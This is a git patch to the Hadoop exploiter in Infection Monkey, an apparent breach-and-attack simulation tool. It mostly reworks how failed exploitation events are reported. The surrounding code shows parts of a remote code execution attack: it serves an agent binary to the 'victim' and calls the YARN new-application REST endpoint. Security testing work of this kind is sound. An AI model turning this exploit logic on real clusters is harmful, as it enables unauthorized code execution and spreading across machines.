From bee1047024bae4a37f00ae95abf412ee092a13b7 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 19:16:22 +0000 Subject: [PATCH] Agent: Update hadoop failed event publishing --- monkey/infection_monkey/exploit/hadoop.py | 27 +++++++++++------------ 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index deece024c..743cf793e 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -55,22 +55,13 @@ class HadoopExploiter(WebRCE): ) return self.exploit_result - try: - monkey_path_on_victim = get_agent_dst_path(self.host) - except KeyError: - self.exploit_result.error_message = f"No coressponding agent found for {self.host}" - self._publish_exploitation_event( - target=self.host.ip_addr, - exploitation_success=False, - error_message=self.exploit_result.error_message, - tags=(HADOOP_EXPLOITER_TAG,), - ) - return self.exploit_result + monkey_path_on_victim = get_agent_dst_path(self.host) http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(monkey_path_on_victim), self.agent_binary_repository ) + tags = (HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG) try: command = self._build_command(monkey_path_on_victim, http_path) @@ -89,13 +80,21 @@ class HadoopExploiter(WebRCE): propagation_success=True, tags=(HADOOP_EXPLOITER_TAG, T1203_ATTACK_TECHNIQUE_TAG), ) + else: + error_message = f"Failed to exploit via {self.vulnerable_urls[0]}" + self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) + self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) + except requests.RequestException as err: + error_message = str(err) + self._publish_exploitation_event(self.host.ip_addr, False, tags, error_message) + self._publish_propagation_event(self.host.ip_addr, False, tags, error_message) finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop() return self.exploit_result - def exploit(self, url, command): + def exploit(self, url: str, command: str): if self._is_interrupted(): self._set_interrupted() return False @@ -104,8 +103,8 @@ class HadoopExploiter(WebRCE): resp = requests.post( posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT ) - resp = json.loads(resp.content) - app_id = resp["application-id"] + resp_dict = json.loads(resp.content) + app_id = resp_dict["application-id"] # Create a random name for our application in YARN # random.SystemRandom can block indefinitely in Linux